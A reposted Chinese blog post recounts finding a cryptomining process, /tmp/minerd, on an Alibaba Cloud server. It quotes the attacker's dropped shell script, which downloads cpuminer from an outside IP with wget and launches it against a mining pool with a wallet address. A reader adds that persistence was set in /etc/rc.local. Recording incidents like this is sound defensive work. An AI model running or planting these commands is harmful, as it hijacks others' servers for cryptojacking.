服务器被挖矿minerd
来源:互联网 发布:邮电大学网络教育 编辑:程序博客网 时间:2024/05/19 15:39
用的阿里云服务器,这两天报警,load值高,
看了下管理控制台,近期流量也耗了不少钱
top 看了下 有个进程耗cpu居高不下,
进程:/tmp/minerd
百度了下,原来是个挖矿程序
如果top看不到的话,ps查看每一个进程名,也可以发现端倪
不知道是暴力破解密码还是通过其他漏洞植入的
在/tmp目录下放了一个sh文件
文件内容:
wget http://211.79.60.17/project/cpuminer/pooler-cpuminer-2.4.2-Linux-x86_64.tar.gz
tar -xzf pooler-cpuminer-2.4.2-linux-x86_64.tar.gz
setsid /tmp/minerd -a scrypt -o 31.41.40.25:9327 -u LNZyZEbAfZDGwb3Cca13qjbcKJ2JfqTTkk:1 &
杀掉进程后查看了下定时任务 crontab -l ,定时任务没有做手脚
目前先修改了登陆密码,后续再观察
转自:http://blog.csdn.net/lubber__land/article/details/49948597
遇到了同样的问题
发现,自启动命令在/etc/rc.local
阅读全文
0 0
- 服务器被挖矿minerd
- 服务器被挖矿minerd
- 阿里云服务器被挖矿minerd入侵的解决办法
- 阿里云服务器被挖矿minerd入侵的解决办法
- minerd
- 阿里云服务器被挖矿minerd入侵的解决办法,导致tomcat启动很慢
- 关于服务被挖矿程序minerd入侵解决方法
- 服务器被攻击,minerd进程为什么和ntp扯上了
- 服务器被入侵(minerd挖矿程序)
- kill掉minerd:别让你的服务器被别人当做挖矿机器
- 阿里云服务器被minerd程序挖矿之redis问题
- CentOS 服务器因 Redis 遭遇挖矿程序 minerd 入侵事件记录
- Linux minerd木马清除
- minerd木马处理流程
- Linux清除木马minerd
- minerd解决随记
- Linux minerd木马清除(续)
- 清除minerd进程的方法
- Moving to “Micro-service” and “Serverless”
- bzoj 1610: [Usaco2008 Feb]Line连线游戏
- 知道这20个正则表达式,能让你少写1,000行代码 沐子哈 发表于10小时前 转 知道这20个正则表达式,能让你少写1,000行代码
- Python之倒序访问list
- 30分钟学会如何使用Shiro
- 服务器被挖矿minerd
- C#中将ASCII码以字符的形式显示
- XYNUOJ 1071 译密码
- 将JBoss启动做成Windows的系统服务
- linux 实现shell睡眠脚本
- 杂题
- 【线段树区间更新 && 染色】ZOJ
- c++用WinForm做界面的实现
- springBoot 多数据源事务的管理以及回滚